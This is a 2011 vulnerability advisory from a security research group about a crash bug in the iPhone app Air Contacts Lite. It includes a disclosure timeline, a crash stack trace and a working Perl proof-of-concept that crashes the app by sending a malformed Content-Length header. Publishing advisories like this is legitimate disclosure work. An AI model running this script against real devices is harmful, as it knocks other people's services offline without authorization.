[Discussion] - DcLabs Security Research Group advises about the following vulnerability(ies): [Software] - Air Contacts Lite (By i-NOVATiON GmbH) [Vendor Product Description] - Sharing contacts can't be easier. Wireless access to your iPhone contacts from your Mac or PC. This is the Lite Version of Air Contacts. If you want more features please upgrade to the normal version. Source:  - http://itunes.apple.com/us/app/air-contacts-lite/id3084752 [Advisory Timeline] - 01/26/2011 -> Advisory sent to vendor. (No response) - 02/15/2011 -> Advisory sent again to vendor. (No response) - 03/04/2011 -> Advisory published. [Impact] - Low [Affected Version] - Air Contacts Lite (Free Version) - Paid version may also be vulnerable - Prior versions may also be vulnerable [Bug Description and Proof of Concept] - While sending crafted HTTP packets the program does not treat invalid requests entering in a NSException crashing the program. Tue Jan 25 21:42:02 Program Name[23594] : *** Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '*** -[NSConcreteData initWithBytes:length:copy:freeWhenDone:bytesAreVM:]: absurd length: 4294967295, maximum size: 2147483648 bytes' *** Call stack at first throw: (      0   CoreFoundation                      0x3048e987 __exceptionPreprocess + 114      1   libobjc.A.dylib                     0x33a0849d objc_exception_throw + 24      2   CoreFoundation                      0x3048e7c9 +[NSException raise:format:arguments:] + 68      3   CoreFoundation                      0x3048e803 +[NSException raise:format:] + 34      4   Foundation                          0x302d2a51 -[NSConcreteData initWithBytes:length:copy:freeWhenDone:bytesAreVM:] + 108      5   Foundation                          0x302df845 -[NSData(NSData) initWithBytes:length:] + 36      6   Foundation                          0x302f224f +[NSData(NSData) dataWithBytes:length:] + 34      7   Foundation                          0x303216ab _performFileHandleSource + 722      8   CoreFoundation 0x304447dd__CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 12      9   CoreFoundation                      0x304165b7 __CFRunLoopDoSources0 + 382      10  CoreFoundation                      0x30415e5b __CFRunLoopRun + 230      11  CoreFoundation                      0x30415c87 CFRunLoopRunSpecific + 230      12  CoreFoundation                      0x30415b8f CFRunLoopRunInMode + 58      13  GraphicsServices                    0x31eec4ab GSEventRunModal + 114      14  GraphicsServices                    0x31eec557 GSEventRun + 62      15  UIKit                               0x313cf329 -[UIApplication _run] + 412      16  UIKit                               0x313cce93 UIApplicationMain + 670      17  Program Name                   0x00002f07 main + 42      18  Program Name                   0x00002ea4 start + 52 ) [PoC] # Air contacts Lite (Denial of Service) #!/usr/bin/perl use IO::Socket;       if (@ARGV < 1) {               usage();       }       $ip     = $ARGV[0];       $port   = $ARGV[1];       print "[+] Sending request...\n";       $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";       print $socket "GET http://www.dclabs.com.br HTTP/1.1\r\n";       print $socket "Host: http://www.dclabs.com.br\r\n";       print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";       sleep(2);       close($socket);       print "[+] Done!\n"; sub usage() {       print "[-] DcLabs - Air Contacts Lite (DoS)\n\n";       print "[-] Usage: <". $0 ."> \n";       print "[-] Example: ". $0 ." 127.0.0.1 80\n";       exit; } All flaws described here were discovered and researched by: Rodrigo Escobar aka ipax. DcLabs Security Research Group ipax (at) dclabs com br [Patch(s) / Workaround] No patch(s) / workaround(s) were provided. [Greetz] DcLabs Security Research Group. -- Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br